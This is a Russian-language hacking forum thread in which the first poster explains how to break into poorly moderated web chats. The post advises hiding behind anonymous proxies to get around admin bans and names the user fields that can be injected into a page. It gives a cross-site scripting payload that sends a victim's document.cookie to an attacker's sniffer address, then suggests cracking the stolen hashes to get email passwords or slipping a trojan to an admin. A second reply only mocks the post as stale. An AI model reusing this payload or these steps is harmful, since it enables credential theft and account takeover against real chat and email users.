О взломе чатов

Тема в разделе "Взлом и уязвимости", создана пользователем Woodman19, 5 июл 2017.

  1. Woodman19

    Woodman19

    Сообщения:
    25
    Баллы:
    1
    Что такое взлом
    В общем взлома чата в определённой степени не существует, однако взломом чатов называется поиск и выявление в нём уязвимых мест, которые позволяют производить действия в чате запрещённые администратором или модератором.
    Какие чаты ломают чаще всего?
    Как правило взламываются плохоадминистрируемые чаты, то есть те чаты, на которых нет администратора и можно творить что угодно: от написания пакостных слов и простого флуда до скажем подвешивания чата на определённое время, например, до появления этого самого администратора. Второе место занимают чаты, на которых админы есть, но появляются редко или по расписанию (днём есть, ночью нет). И последнее место занимают чаты, на которых постоянно торчит администратор, оно и понятно кому хочется быть выкинутым из чата или отключенным на определённое время, но при определённых действиях можно ломать и такие чаты, хотя это немного сложнее и требует определённого подхода.
    Итак, мы стоим на пороге HTML чата. Допустим, что мы хотим проверить его на "прочность". Что делать в первую очередь? В первую очередь мы подключаемся через анонимный прокси (надеюсь Вы знаете что это такое). Это нужно по двум причинам: во-первых мы обеспечиваем свою анонимность (что бы дядя админ не надавал по попке), а во-вторых, если админу все же не понравятся наши эксперименты и он закроет нам форточку в чат, то мы бы могли переключать свои прокси на другие IP адреса и снова заходить в чат. Правда тут имеется одно но: вход на некоторые чаты не разрешен через публичные прокси.
    Далее мы должны выяснить, какое собственно оружие у нас есть, то есть какие атрибуты может задавать юзер. Как правило, во всех чатах можно вводить НИК юзера, а также ЦВЕТ юзера. Помимо этого, иногда можно задавать МЫЛО юзера, его домашнюю веб-страничку, пол, частоту обновления чата и др. На практике интерес представляют такие поля как цвет, ник, мыло и домашняя страничка юзера. Именно они вставляются непосредственно в тело документа, и потому именно через них можно атаковать чат. Следует отметить, что в некоторых чатах нужна регистрация, и часть атрибутов задается при регистрации, а часть - непосредственно перед входом в чат (или уже внутри чата). Чаты с регистрацией, как правило, более круто навороченные и лучше защищены.

    Сегодняшние Народовские чаты, почти невозможно взломать. Хотя всё таки есть одни способ взломать сразу мыло сайт и чат юзера. Эта фишка называется пассивная XSS. Регистрируем себе сниффер на античате. и отправляем пользователю на мыло ядовитый код
    Quote
    Код:
    <script>img = new Image(); img.src = "АДРЕС_ВАШЕГО_СНИФФЕРА"+document.cookie;</script>
    . После того как юзер откроет ваше письмо вам должны буду прийти в лог сниффера кукисы. Если хотите расшифровать куки и получить пароль от мыла (соответственно от сайта и чата) необходимо воспользоваться прогой MD5inside для расшифровки кукисов. Есть второй способ. можно впарить админу трояна. Ну а после того как вы получили пароль можете творить что угодно)
  2. Siberya

    Siberya

    Сообщения:
    682
    Баллы:
    16
    Хуйня эта была на форуме HPC еще в 2010 году.Тыб еще к бабушке в сундук заглянул,мож там чего нарыл бы!

Поделиться этой страницей